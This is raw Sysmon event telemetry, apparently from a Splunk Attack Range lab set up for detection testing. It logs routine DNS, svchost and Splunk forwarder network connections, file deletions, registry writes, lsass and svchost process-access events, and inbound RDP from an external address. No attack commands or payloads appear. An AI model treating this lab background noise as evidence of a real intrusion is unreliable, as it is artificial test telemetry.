AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53894-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000294452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:31.479{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 10341000x8000000000000000294451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:34.073{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32475|C:\Windows\system32\lsasrv.dll+302fb|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 13241300x8000000000000000294450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.057{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\RegisteredSinceBootDWORD (0x00000001) 23542300x8000000000000000294468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:35.657{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E0FA5EAEAD1FD48AF910459F4E827A7,SHA256=D85567EC544BA18A6533DCA52442C5B9BE13303AB7F67A1FEB1373E00360DD6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:35.067{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FB7E664CD5ACA371591E319B8844014,SHA256=F933074E363699EF9076ED8E9FBB5FE7CFDC0E5539608E0126962F1C521A3218,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:36.660{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A65DADFA22C480A3C7B124CACF7E91D,SHA256=CEC27C6F535AF0AFFDE87F2DB3EF1416C3CC62CB35A18D9F906A7AFB90AC1BE5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:34.514{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51479-false10.0.1.12-8000- 23542300x8000000000000000218714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:36.115{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC621E5D9384098F4663458F647880E,SHA256=F4C41BC864695F2DA96EB70F16B5EE32E13304C467E5DD9E4388FBDE1AD51450,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.566{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local59576- 354300x8000000000000000294480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.565{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65535-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000294479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.564{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:c830:d833:fbf:ffff-65535-truea00:10e:0:0:0:0:0:0win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000294478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.563{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54453- 354300x8000000000000000294477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.562{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60107- 354300x8000000000000000294476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.562{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60107-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000294475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.552{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local65523-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.552{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local65523-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.550{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local54369- 354300x8000000000000000294472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.548{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65522-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000294471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.548{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65522-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000294470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.545{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local57393- 354300x8000000000000000294469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.544{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local57393-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domain 23542300x8000000000000000294483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:37.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CB39765C219EF889B62E2DBCC2093F1,SHA256=8D2381F4F339C65B061F4A1CB05FA90865C580FF738BE4401AE74876CD662C3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:35.401{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx60094-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:37.129{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDCD8F403012CCC59C37E29FFAF0AE8D,SHA256=34A78E06A6103908BEEFF4F8C5C73FECCE27CC24BB63EB697F0D4C6CE7923D42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:38.691{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B507D9F9BBE7342D014AC14A9124EFB7,SHA256=D16C8A3044B88032D805FEFAB762853C4E9922FFB2B8426C33C3BFD28200F257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:38.192{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B3F2210464FF3D35E029DD538EE3DAB,SHA256=133CF620E6B21CC8A918BC39417A3322B4766AFEC4C39E936925160DED06008A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:38.192{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD87CF7CF7FC81DEF6EF30259DE8121B,SHA256=FA801472C2773821B4EDE92E81F36CBDE9D64BDC3707E3EC3A4C0880068F55D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:38.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3871D85F8CDEB66D27D02F9DFAF71B97,SHA256=9ACA77C80D6BB6B784A109A944D0E77547872FA0A9FE074EF83CD9235D1D274F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:39.711{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A96B8427FCB0F103026AB0F3E86C64C,SHA256=CE40572EA3BA70A06FB3013E5A7AED6B8CA4EB9AB69A597332E935DCC9BA403C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:39.254{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=508DAEA8B071A45535B47B4BA46148C2,SHA256=71CF41A1CB91E12A32737916EF6452635709E554C92F6CD50FA41B095776A0D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:36.502{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65524-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:40.727{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=174CE65E095014CE08CA38D6A5586E4B,SHA256=6135FB6452A2EF7F225A457A45F66F9B54D54F20D74BA1607E35DC07A401A59F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:40.301{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90CECB5A992D728A41A9453484A30763,SHA256=8E00BDA9273B95FACE0CCA834D6659A70A8AAC5BDE17DF5A5BADAAB8D00C494A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:40.128{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:41.727{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B9CDAF8653195CBFCDF84DF79BF955B,SHA256=9C395A9CA81603C8DEFC96FD6535C6314164E72D31563FF1BCE3BF6B371F3F95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:41.739{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B3F2210464FF3D35E029DD538EE3DAB,SHA256=133CF620E6B21CC8A918BC39417A3322B4766AFEC4C39E936925160DED06008A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:41.348{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F19B4B957C90FF824393F0D1639867DF,SHA256=75333499A458872B689588ED7BD013141983B0B6029D1CB96FAF96B428A5EEB7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:38.438{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53495-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:42.582{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A096B62FBFDCDA3A1465A9D087953C9C,SHA256=03FA9E5F15C2729A7CBFB0C579F4692283E5C0CA6BCA8E454F4BAD3843A836BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:42.989{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:42.927{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 23542300x8000000000000000294491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:42.742{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A50E68D6E0CC71D250D16EA7BDF1882,SHA256=97F835C54044D55E13F591982F4EDAD2CA3F783A59E8B8EBD0E61B6110984413,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:39.601{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65525-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000294499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:43.943{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E941A82F1AD3C73272855DA0E30B217,SHA256=916C857CDA5C5250C32EFC8D4CEDB32BC216C5013F5EA0580983189BF6C70C73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:43.927{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E69AD869FEB75333F9D516416C282B9,SHA256=13D897074DF28172D977DBFFB34B78AC0F1E11A86AB486710943666F071A93C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:43.759{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6394FAF75BC01D298F2A45148A2420FC,SHA256=908110F2BF595213BB9C2CD28DDDCF7C5378138504785257DCAD66691D3DB504,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:43.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AA91239926F49155E49C8179BC7F9DB,SHA256=68377874FB0F9898A6B7A7FC34F37E355A2F7F997233601C3BA31EBA53461EF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:40.561{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51480-false10.0.1.12-8000- 354300x8000000000000000294496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:41.647{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65526-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:43.190{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4EC85101A9B17B5F172EADF3480C50CA,SHA256=B1CF637AB5C5BD4A76C7585FFF83D7630F8D6B397174C9282BF244F67D13D129,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:43.190{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3FD65B074DBDC03D61602E0EAED0B1EF,SHA256=56F1F35F73636ADDE9892DCB6016644395183685101DD1C2ACE8BA9CFB2EF793,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 